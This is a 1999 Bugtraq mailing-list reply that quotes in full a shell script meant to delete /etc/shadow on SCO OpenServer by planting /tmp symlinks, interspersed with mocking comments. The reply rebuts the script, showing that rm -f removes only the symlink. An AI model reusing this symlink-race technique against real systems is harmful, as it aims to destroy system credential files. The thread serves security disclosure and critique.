Bugtraq mailing list archives

Re: Little exploit for startup scripts (SCO 5.0.4p).

From: peter () ATTIC VUURWERK NL (Peter van Dijk)
Date: Mon, 8 Mar 1999 08:43:15 +0100


On Sun, Mar 07, 1999 at 03:07:23PM +0300, leshka wrote:

#!/bin/sh
#
#                                   ... The punishment for inobedience ...
#                                                   (Cycle # 2)
#
#                This simple script can help to erase any file
#                 (SCO OpenServer Enterprise System v 5.0.4p).


Umm.. I don't think so...

if [ _$1 = "_" ]
then
    {
     echo -n "File to delete [/etc/shadow]:"
     read victim_file
     if [ _$victim_file = "_" ]
        then
            victim_file="/etc/shadow"
        fi
    }
else
    victim_file=$1
fi


nice.

pid=`/bin/ps -ef|/bin/grep -v awk|/usr/bin/awk '/inetd/ { printf  $2 }'`


nice.

lastpid=`expr $pid - 30`


good thinking!

while [ $pid != $lastpid ]
      do
        pid=`expr $pid - 1`;ln -fs /etc/shadow /tmp/tps$pid


nice.

      done
echo Done ! File \"$victim_file\" will be destroyed after the next reboot.


No. rm -f removes just the symlink, not the target file.

Try this (tested on Linux, but SCO doesn't seem too broken to me):
# touch /etc/blah
$ ln -sf /etc/blah /tmp/blih
# rm -f /tmp/blih
# ls -al /etc/blah
-rw-r--r--   1 root     root            0 Mar  8 08:40 /etc/blah

Doesn't look very deleted to me...

Greetz, Peter.
--
.| Peter van Dijk           | <mo|VERWEG> stoned worden of coden
.| peter () attic vuurwerk nl  | <mo|VERWEG> dat is de levensvraag
                            | <mo|VERWEG> coden of stoned worden
                            | <mo|VERWEG> stonend worden En coden
                            | <mo|VERWEG> hmm
                            | <mo|VERWEG> dan maar stoned worden en slashdot lezen:)

Current thread:

buffer overflow in /usr/bin/cancel, (continued)
- - - buffer overflow in /usr/bin/cancel Josh A. Strickland (Mar 05)
    - Re: Linux /usr/bin/gnuplot overflow -- SuSE hasnt fixed lsof Mario Lorenz (Mar 05)
    - Update to Microsoft Security Bulletin (MS99-006) aleph1 () UNDERGROUND ORG (Mar 05)
    - More Internet Explorer zone confusion Jim Paris (Mar 05)
    - Re: More Internet Explorer zone confusion Walt Armour (Mar 08)
    - Re: More Internet Explorer zone confusion Jeremy Nimmer (Mar 08)
    - Re: More Internet Explorer zone confusion Jim Paris (Mar 08)
    - ISAPI Extension vulnerability allows to execute code as SYSTEM Aleph One (Mar 08)
    - Re: More Internet Explorer zone confusion David E. Smith (Mar 08)
    - Little exploit for startup scripts (SCO 5.0.4p). leshka (Mar 07)
    - Re: Little exploit for startup scripts (SCO 5.0.4p). Peter van Dijk (Mar 07)
    - Re: Little exploit for startup scripts (SCO 5.0.4p). Taneli Leppä (Mar 08)
    - Call for Papers: CQRE Detlef Hühnlein (Mar 08)
    - Re: Little exploit for startup scripts (SCO 5.0.4p). Jon Coyle (Mar 08)